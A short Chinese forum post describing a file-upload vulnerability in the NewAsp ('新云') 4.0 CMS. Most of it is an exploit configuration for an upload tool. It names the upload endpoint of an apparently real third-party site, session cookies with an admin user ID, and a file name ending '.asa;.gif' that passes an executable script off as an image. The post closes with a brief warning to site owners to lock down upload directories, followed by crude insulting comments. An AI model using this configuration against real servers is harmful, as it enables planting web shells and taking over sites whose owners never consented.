新云4.0上传漏洞
[tag]newasp[/tag]
利用代码如下:
[code]
url=http://localhost/user/upload.asp
filefield=File1
filefield2=
filename=200981623554.asa;.gif
filename2=
local=
local2=
type=image/gif
type2=image/gif
cookies=ASPSESSIONIDSCQACRSS=ENDNFJMAKMIBLFBNCCBFOEOM; DLER=; DLIP=127%2E0%2E0%2E1; iscookies=0; USER_ID=seraph; CFID=101; CFTOKEN=11846965
name=uploadPic&value=
name=Rename&value=1
url=http://www.yingxiaoseo.com/user/upload.asp?action=save&ChannelID=1&sType=
filefield=File1
filefield2=
filename=200981623554.asa;.gif
filename2=
local=
local2=
type=image/gif
type2=image/gif
cookies=ASPSESSIONIDSCQACRSS=ENDNFJMAKMIBLFBNCCBFOEOM; DLER=; DLIP=127%2E0%2E0%2E1; iscookies=0; USER_ID=admin; CFID=101; CFTOKEN=11846965
name=uploadPic&value=
name=Rename&value=1
[/code]
该漏洞具有危害性,暂不提供利用工具和方法。
请使用该程序的各位看官设置好权限或及时查看上传目录,以免杯具。
英雄是哈儿
2010-03-09 03:24弄你
2010-03-09 03:54阴熊是哈儿
---------------------------------------------------------------------------
2011-01-05 14:25日你大爷的,淫色你个2B